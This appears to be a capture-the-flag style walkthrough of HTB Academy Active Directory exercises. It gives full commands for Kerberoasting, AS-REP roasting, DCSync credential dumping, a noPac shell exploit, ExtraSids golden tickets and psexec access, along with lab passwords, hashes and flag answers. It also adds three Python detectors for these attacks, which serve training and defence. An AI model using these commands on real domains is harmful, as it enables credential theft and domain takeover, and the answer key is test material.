Q1) Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.

Given that we have **GenericAll** permissions on this account, we can conduct a targeted Kerberoasting attack by modifying the account's **servicePrincipalName (SPN)** attribute to register a fake SPN. This will allow us to request a **Ticket Granting Service (TGS)** ticket, which we can then extract and attempt to crack offline using **Hashcat**.

```powershell
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose
```

<figure><img src="/files/r9j5NVtIwADqjd2h0guZ" alt=""><figcaption></figcaption></figure>

```powershell
.\Rubeus.exe kerberoast /user:adunn /nowrap
```

<figure><img src="/files/yB75yCudcFYXI6cHlreP" alt=""><figcaption></figcaption></figure>

Let's save this TGS to a file and attempt to crack it using Hashcat.

```bash
hashcat -m 13100 adunn_TGS /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/NnDjpdtA8pnx7Bokovch" alt=""><figcaption></figcaption></figure>

Answer:  SyncMaster757

## DCSync

Q1) Perform a DCSync attack and look for another user with the option "Store password using reversible encryption" set. Submit the username as your answer.

```powershell
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```

<figure><img src="/files/UijMsROFZyOs9fORrO8F" alt=""><figcaption></figcaption></figure>

Answer:  syncron

Q2) What is this user's cleartext password?

```bash
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 
```

<figure><img src="/files/VoLFCV8e8jCNJaX6Qm7T" alt=""><figcaption></figcaption></figure>

Answer:  Mycleart3xtP\@ss!

Q3) Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.

```bash
secretsdump.py -outputfile inlanefreight_hashes -just-dc-user khartsfield INLANEFREIGHT/adunn@172.16.5.5 
```

<figure><img src="/files/gtLvgoJQai8tz44ZN83N" alt=""><figcaption></figcaption></figure>

Answer:  4bb3b317845f0954200a6b0acc9b9f9a
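A DCSync is a directory replication request, so on the domain controller it shows up as Event ID 4662 with the replication control-access rights in the Properties field, issued by a principal that is not a domain controller. The following is an added example (not from this write-up or from secretsdump.py) that triages constructed 4662-style records against a list of known DC computer accounts and reports only the replication requests that did not come from a DC. The event records are constructed, not real audit output; the GUIDs are the documented replication rights, and the DC name and user names are the ones this write-up uses.

```python
"""Find non-DC principals exercising directory replication rights in 4662
records, the footprint a DCSync leaves on the domain controller. Added example;
the event records below are constructed, not real Security log entries."""
import re

# Control-access-right GUIDs that directory replication requires.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed, simplified 4662 records. Real events carry the GUIDs one per
# line in the Properties field; the shape here is enough for the logic.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "ACADEMY-EA-DC01$", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "adunn", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "forend", "SubjectDomainName": "INLANEFREIGHT",
     "ObjectType": "user",
     "Properties": "{11111111-2222-3333-4444-555555555555}"},   # constructed, non-replication GUID
    {"EventID": 4624, "SubjectUserName": "forend", "SubjectDomainName": "INLANEFREIGHT"},
]


def replication_rights(properties):
    """Names of replication rights present in a 4662 Properties string."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def find_dcsync(events, dc_accounts):
    """Return the 4662 events in which a principal outside `dc_accounts`
    exercised a replication right. Events without a replication GUID, and
    replication by the DCs themselves, are dropped as normal activity."""
    known_dcs = {d.upper() for d in dc_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights or ev["SubjectUserName"].upper() in known_dcs:
            continue
        hits.append({"subject": f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}',
                     "rights": rights, "object": ev.get("ObjectType")})
    return hits


if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_EVENTS, {"ACADEMY-EA-DC01$"}):
        print(f"possible DCSync by {hit['subject']}: {', '.join(hit['rights'])}")
```

The DC allow-list should come from inventory (`Get-ADDomainController` output), not from the trailing `$` alone, since every computer account ends in `$`. Also note that 4662 is only written when the "Audit Directory Service Access" subcategory is enabled and a SACL on the domain object covers these rights, so confirm that before relying on this detection.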

## Privileged Access

Q1) What other user in the domain has CanPSRemote rights to a host?

```cypher
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
```

<figure><img src="/files/clfWSNlGHySjW8XPEvbv" alt=""><figcaption></figcaption></figure>

Answer:  bdavis

Q2) What host can this user access via WinRM? (just the computer name)

<figure><img src="/files/lv9kwBTTm9jcBB0ZIfi7" alt=""><figcaption></figcaption></figure>

Answer: ACADEMY-EA-DC01

Q3) Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

```bash
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
```

<figure><img src="/files/VtSZWkFHPmwgXSOeoACF" alt=""><figcaption></figcaption></figure>

Answer:  1m\_the\_sQl\_@dm1n\_n0w!

## Bleeding Edge Vulnerabilities

Q1) Which two CVEs indicate NoPac.py may work? (Format: ####-#####\&####-#####, no spaces)

Answer:  2021-42278&2021-42287

Q2) Apply what was taught in this section to gain a shell on DC01. Submit the contents of flag.txt located in the DailyTasks directory on the Administrator's desktop.

First, let's determine whether the system is vulnerable.

```bash
sudo python3 /opt/noPac/scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
```

<figure><img src="/files/jUNSHzTjCMTbfdo5EbtY" alt=""><figcaption></figcaption></figure>

Next, we will attempt to obtain a shell with SYSTEM-level privileges by executing `noPac.py`. This tool allows us to impersonate the built-in Administrator account and initiate a semi-interactive shell session on the target Domain Controller.

```bash
sudo python3 /opt/noPac/noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5  -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
```

<figure><img src="/files/0oPrd214BQ7zViaNvblL" alt=""><figcaption></figcaption></figure>

Answer:  D0ntSl\@ckonN0P\@c!

## Miscellaneous Misconfigurations

Q1) Find another user with the passwd\_notreqd field set. Submit the samaccountname as your answer. The samaccountname starts with the letter "y".

```powershell
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
```

<figure><img src="/files/4ltz4ZXlcFWFTN8C6q4e" alt=""><figcaption></figcaption></figure>

Answer:  ygroce

Q2) Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer.

First, let's find the users that do not require Kerberos pre-authentication.

```powershell
Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl
```

<figure><img src="/files/NcVpfhKHdRmCGt0CsG3c" alt=""><figcaption></figcaption></figure>

Next, let's retrieve the AS-REP in the proper format for offline hash cracking.

```powershell
.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat
```

<figure><img src="/files/2bFvUHtVpO1y9md3fQ02" alt=""><figcaption></figcaption></figure>

```bash
hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/p478abKffNi2hM2UB6Ed" alt=""><figcaption></figcaption></figure>

Answer:  Pass\@word
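Both findings in this section (Q1's `PASSWD_NOTREQD` and Q2's "do not require Kerberos pre-authentication") are single bits in the `userAccountControl` attribute that PowerView's `-UACFilter` and `-PreauthNotRequired` switches test. The Python below is an added example, not code from the module or from PowerView, that decodes that bitmask and audits a list of accounts the way a defender would when reviewing the `samaccountname,useraccountcontrol` output above. The bit values are the documented ones; the account names and values are constructed sample data.

```python
# Added example, not from the HTB Academy module: decode the userAccountControl
# bitmask that PowerView's -UACFilter / -PreauthNotRequired switches query, and
# flag the two misconfigurations covered above. Sample accounts are constructed.
from typing import Dict, Iterable, List, Tuple

# Bit values of the userAccountControl attribute (Microsoft documentation).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}

ACCOUNTDISABLE = 0x0002
PASSWD_NOTREQD = 0x0020
DONT_REQ_PREAUTH = 0x400000


def decode_uac(value: int) -> List[str]:
    """Return the symbolic flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit_accounts(accounts: Iterable[Tuple[str, int]]) -> Dict[str, List[str]]:
    """Return {samaccountname: [findings]} for enabled accounts with risky UAC bits.

    `accounts` holds (samaccountname, userAccountControl) pairs, i.e. the columns
    selected from Get-DomainUser above. Disabled accounts are skipped: they can
    neither be AS-REP roasted nor logged into, so they are lower priority.
    """
    findings: Dict[str, List[str]] = {}
    for sam, uac in accounts:
        if uac & ACCOUNTDISABLE:
            continue
        issues = []
        if uac & PASSWD_NOTREQD:
            issues.append("PASSWD_NOTREQD: account may have an empty password")
        if uac & DONT_REQ_PREAUTH:
            issues.append("DONT_REQ_PREAUTH: AS-REP roastable (hashcat -m 18200)")
        if issues:
            findings[sam] = issues
    return findings


# Constructed sample data:
#   512     = NORMAL_ACCOUNT
#   544     = NORMAL_ACCOUNT | PASSWD_NOTREQD
#   4260352 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
#   4194818 = NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE
SAMPLE_ACCOUNTS = [
    ("forend", 512),
    ("ygroce", 544),
    ("mmorgan", 4260352),
    ("svc_old", 4194818),
]

if __name__ == "__main__":
    for sam, uac in SAMPLE_ACCOUNTS:
        print(f"{sam:10} {uac:>8} {decode_uac(uac)}")
    for sam, issues in audit_accounts(SAMPLE_ACCOUNTS).items():
        print(sam, "->", "; ".join(issues))
```

The same decode is what PowerView does internally when it renders `useraccountcontrol` as flag names; feeding it a CSV export of all users gives a quick list of accounts to fix (clear the bit, set a strong password) before an attacker finds them with the queries above.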

## Domain Trusts Primer

Q1)  What is the child domain of INLANEFREIGHT.LOCAL? (format: FQDN, i.e., DEV.ACME.LOCAL)

```powershell
Import-Module ActiveDirectory
Get-ADTrust -Filter *
```

<figure><img src="/files/wJ7NDgIjoVmw40k7EObr" alt=""><figcaption></figcaption></figure>

Answer:  LOGISTICS.INLANEFREIGHT.LOCAL

Q2) What domain does the INLANEFREIGHT.LOCAL domain have a forest transitive trust with?

<figure><img src="/files/Xa4PTyg5UnQIwDlIvIig" alt=""><figcaption></figcaption></figure>

Answer:  FREIGHTLOGISTICS.LOCAL

Q3) What direction is this trust?

<figure><img src="/files/HWrpqoFM3BQEAUvmIy5F" alt=""><figcaption></figcaption></figure>

Answer:  Bidirectional

## Attacking Domain Trusts - Child -> Parent Trusts - from Windows

Q1) What is the SID of the child domain?

```powershell
Import-Module .\PowerView.ps1
Get-DomainSID
```

<figure><img src="/files/SRsLjohiR8e3O9G10bvm" alt=""><figcaption></figcaption></figure>

Answer:  S-1-5-21-2806153819-209893948-922872689

Q2) What is the SID of the Enterprise Admins group in the root domain?

```powershell
Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
```

<figure><img src="/files/WAFaDAt7Q4Wqc0WqiZyX" alt=""><figcaption></figcaption></figure>

Answer:  S-1-5-21-3842939050-3880317879-2865463114-519

Q3) Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.

First, let's retrieve the hash of the **krbtgt** account.

```powershell
.\mimikatz.exe
lsadump::dcsync /user:LOGISTICS\krbtgt
```

<figure><img src="/files/0gNNqxCuDIIwvbBNmpl6" alt=""><figcaption></figcaption></figure>

We now have the **krbtgt hash**, the **SID of the Enterprise Admins group**, and the **SID of the child domain**, which enables us to **create a Golden Ticket.**

```powershell
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt
```

<figure><img src="/files/Ub3cZnkbdtrrcHlC6Ziw" alt=""><figcaption></figcaption></figure>

Now we can retrieve the flag from the parent domain's Domain Controller.

```powershell
cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt
```

<figure><img src="/files/Y3FNGfuZLTpDqeKwwsbV" alt=""><figcaption></figcaption></figure>

Answer:  f\@ll1ng\_l1k3\_d0m1no3$

## Attacking Domain Trusts - Child -> Parent Trusts - from Linux

Q1) Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

First, let's retrieve the hash of the **krbtgt** account.

```bash
secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt
```

<figure><img src="/files/XRFNKfNCDW156FdeYgBg" alt=""><figcaption></figcaption></figure>

Next, we need to get the SID of the child domain.

```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 
```

<figure><img src="/files/XqMV1Ia0lVs0Jd3B8M8p" alt=""><figcaption></figcaption></figure>

Next, we can rerun the command against the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5 and grab the parent domain's `SID`, which is the prefix of the Enterprise Admins group's SID.

```bash
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"
```

<figure><img src="/files/BwqeXYmX8nN6ngTedAlm" alt=""><figcaption></figcaption></figure>

Next, we can use **`ticketer.py`** from the **Impacket toolkit** to generate a Golden Ticket, which grants access to resources in both the **child** and **parent domains**.

```bash
ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker
```

<figure><img src="/files/TDk0uOWrD3lvboYjuz8u" alt=""><figcaption></figcaption></figure>

The ticket will be stored in our system as a credential cache (ccache) file, which holds Kerberos credentials. By setting the `KRB5CCNAME` environment variable, the system is directed to use this file for Kerberos authentication.

```bash
export KRB5CCNAME=hacker.ccache 
```

<figure><img src="/files/oGfc49h5jpraArzih0A5" alt=""><figcaption></figcaption></figure>

Now, we need to check if we can successfully authenticate to the parent domain's Domain Controller.

```bash
psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5
```

<figure><img src="/files/wir6AVhc1Yy0904brBGB" alt=""><figcaption></figcaption></figure>

Impacket also has the tool `raiseChild.py`, which automates the escalation from the child domain to the parent domain.

```bash
raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```

<figure><img src="/files/jo7hG7X4JMF5t8c6ozWK" alt=""><figcaption></figcaption></figure>

Let's retrieve the NTLM hash for the domain administrator account, **bross**.

```bash
secretsdump.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5 | grep "bross"
```

<figure><img src="/files/mx0LzkXJeqPWJjFfqOaI" alt=""><figcaption></figcaption></figure>

Answer:  49a074a39dd0651f647e765c2cc794c7

## Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows

Q1) Perform a cross-forest Kerberoast attack and obtain the TGS for the mssqlsvc user. Crack the ticket and submit the account's cleartext password as your answer.

We can use PowerView to enumerate accounts within the target domain that have associated Service Principal Names (SPNs).

```powershell
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName
```

<figure><img src="/files/vPjo9eghQs8ye7JEhbXv" alt=""><figcaption></figcaption></figure>

Let's perform a Kerberoasting attack across the trust using `Rubeus`.

```powershell
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap
```

<figure><img src="/files/CbKzKmOsxTEdB2bUDsHJ" alt=""><figcaption></figcaption></figure>

Let's save the hash to a file and attempt to crack it using Hashcat in order to retrieve the plaintext password.

```bash
hashcat -m 13100 mssqlsvc_tgs /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/HDBzlJqJtGC0oV18dDSa" alt=""><figcaption></figcaption></figure>

Answer:  1logistics

## Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux

Q1) Kerberoast across the forest trust from the Linux attack host. Submit the name of another account with an SPN aside from MSSQLsvc.

We obtained the password for the user account **wley** earlier: **transporter\@4**.

```bash
GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```

<figure><img src="/files/PIIucdyU3pfRkdYKmyKX" alt=""><figcaption></figcaption></figure>

Answer: sapsso

Q2) Crack the TGS and submit the cleartext password as your answer.

```bash
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
```

<figure><img src="/files/aQ8DitS51kCaU6Tz3KUf" alt=""><figcaption></figcaption></figure>

```bash
hashcat -m 13100 sapsso_tgs /usr/share/wordlists/rockyou.txt
```

<figure><img src="/files/m9TwpieIbKPx63fxeXWT" alt=""><figcaption></figcaption></figure>

Answer:  pabloPICASSO
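The AS-REP roast of `mmorgan` earlier and the Kerberoasting of `mssqlsvc` and `sapsso` in the last two sections leave the same two traces on a Domain Controller: a 4768 issued without pre-authentication, and 4769 service-ticket requests for user-account SPNs encrypted with RC4 (etype 23, what `Rubeus` and `GetUserSPNs.py` request and what hashcat modes 18200 and 13100 crack). The Python below is an added example, not code from the module, that runs that detection logic over a handful of constructed events. Field names are those of the `EventData` of 4768 and 4769; the events and the source address are constructed.

```python
# Added example, not part of the HTB Academy module: detection logic for AS-REP
# roasting and Kerberoasting, run over constructed Windows Security events.
# Field names follow the EventData of events 4768 (TGT requested) and 4769
# (service ticket requested); the events and the source address are constructed.
from collections import defaultdict
from typing import Dict, List

RC4_HMAC = "0x17"   # etype 23: requested by Rubeus/GetUserSPNs.py, cracked with -m 18200/13100
SUCCESS = "0x0"

Event = Dict[str, str]


def is_asrep_roast_candidate(ev: Event) -> bool:
    """4768 answered without pre-authentication (PreAuthType 0) and RC4-encrypted."""
    return (ev.get("EventID") == "4768" and ev.get("Status") == SUCCESS
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType") == RC4_HMAC)


def is_kerberoast_candidate(ev: Event) -> bool:
    """4769 for a user-account SPN (not a machine account, not krbtgt) with RC4."""
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769" and ev.get("Status") == SUCCESS
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$") and svc.lower() != "krbtgt")


def detect(events: List[Event]) -> List[str]:
    """One alert per matching event, plus one per source address that pulled
    RC4 tickets for two or more distinct user SPNs (bulk requests such as
    GetUserSPNs.py -request)."""
    alerts: List[str] = []
    spns_by_source = defaultdict(set)
    for ev in events:
        if is_asrep_roast_candidate(ev):
            alerts.append(f"ASREP-roast: {ev['TargetUserName']} from {ev['IpAddress']}")
        if is_kerberoast_candidate(ev):
            alerts.append(f"Kerberoast: {ev['ServiceName']} by {ev['TargetUserName']} "
                          f"from {ev['IpAddress']}")
            spns_by_source[ev["IpAddress"]].add(ev["ServiceName"])
    for ip, spns in spns_by_source.items():
        if len(spns) >= 2:
            alerts.append(f"Bulk Kerberoast: {ip} requested {len(spns)} user SPNs with RC4")
    return alerts


ATTACK_HOST = "172.16.5.225"   # constructed source address
SAMPLE_EVENTS: List[Event] = [
    {"EventID": "4768", "TargetUserName": "mmorgan", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": ATTACK_HOST},
    {"EventID": "4768", "TargetUserName": "forend", "PreAuthType": "2",     # normal logon
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "172.16.5.25"},
    {"EventID": "4769", "TargetUserName": "wley@INLANEFREIGHT.LOCAL", "ServiceName": "mssqlsvc",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": ATTACK_HOST},
    {"EventID": "4769", "TargetUserName": "wley@INLANEFREIGHT.LOCAL", "ServiceName": "sapsso",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": ATTACK_HOST},
    {"EventID": "4769", "TargetUserName": "forend@INLANEFREIGHT.LOCAL",    # machine SPN, AES
     "ServiceName": "ACADEMY-EA-DC01$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "172.16.5.25"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

For the cross-forest case, the 4769 is written by the DC of the domain that owns the SPN (here FREIGHTLOGISTICS.LOCAL), with the requester shown under its foreign realm, so the logs of the trusting forest have to be collected too. The RC4 signal disappears once service accounts are AES-only, which is also the mitigation; after that, baselining which accounts normally request which SPNs is what is left.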

Q3) Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.

```bash
psexec.py ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL/sapsso:pabloPICASSO@172.16.5.238
```

<figure><img src="/files/b3k5V9ZC9bbLtAnrhWpy" alt=""><figcaption></figcaption></figure>

Answer:  burn1ng\_d0wn\_th3\_f0rest!
